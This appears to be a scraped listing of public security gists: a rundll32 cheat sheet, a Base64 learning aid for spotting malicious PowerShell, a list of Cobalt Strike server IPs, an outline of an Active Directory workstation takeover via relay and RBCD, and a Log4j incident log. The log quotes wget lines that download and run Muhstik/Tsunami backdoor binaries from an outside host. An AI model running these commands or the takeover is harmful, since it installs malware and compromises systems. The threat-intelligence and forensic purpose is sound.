- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
Steve CyberSecOps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa | |
| 149601e15002f78866ab73033eb8577f11bd489a4cea87b10c52a70fdf78d9ff | |
| 190d9c3e071a38cb26211bfffeb6c4bb88bd74c6bf99db9bb1f084c6a7e1df4e | |
| 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c | |
| 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd | |
| 4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982 | |
| 593bbcc8f34047da9960b8456094c0eaf69caaf16f1626b813484207df8bd8af | |
| 5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec | |
| 7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff | |
| 9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640 |
scotgabriel
/ Windows command line gui access.md
Last active
November 11, 2023 14:53
Common windows functions via rundll user32 and control panel
Neo23x0
/ Base64_CheatSheet.md
Last active
May 23, 2024 08:25
Learning Aid - Top Base64 Encodings Table
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
📺 Television | MZ |
MZ header |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
🐣 Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
🐣 Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
💪 "Pah!" | <. |
Often used by Emotet (UTF-16) |
muff-in
/ resources.md
Last active
June 29, 2024 02:00
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
MichaelKoczwara
/ Cobalt Strike servers 192.151.234.160 - 192.151.234.190
Last active
April 10, 2021 11:35
Cobalt Strike servers 192.151.234.160 - 192.151.234.190
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Cobalt Strike Servers: | |
| 192.151.234.160 | |
| 192.151.234.161 | |
| 192.151.234.162 | |
| 192.151.234.163 | |
| 192.151.234.164 | |
| 192.151.234.165 | |
| 192.151.234.166 | |
| 192.151.234.167 |
gladiatx0r
/ Workstation-Takeover.md
Last active
June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
0xmachos
/ macOS-IR-Forensics.md
Last active
June 5, 2024 01:58
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
yt0ng
/ gist:8a87f4328c8c6cde327406ef11e68726
Last active
December 15, 2021 03:13
Log4j Payload Dropped
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 45.130.229.168:1389/Exploit.class | |
| Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
| --> curl http://18.228.7.109/.log/log | |
| log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
| --> Download of Muhstik/Tsunami Backdoor | |
| wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
| wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
| wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & |
Purp1eW0lf
/ Pull_logs_and_zip.ps1
Created
February 17, 2022 00:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Ensure errors don't ruin anything for us | |
| $ErrorActionPreference = "SilentlyContinue" | |
| # Set variables | |
| $DesktopPath = [Environment]::GetFolderPath("Desktop") | |
| $basic = "C:\windows\System32\winevt\Logs\Application.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx", "C:\windows\System32\winevt\Logs\System.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx", "C:\windows\System32\winevt\Logs\Security.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx" | |
| $remote_logs = "C:\windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx" |
OlderNewer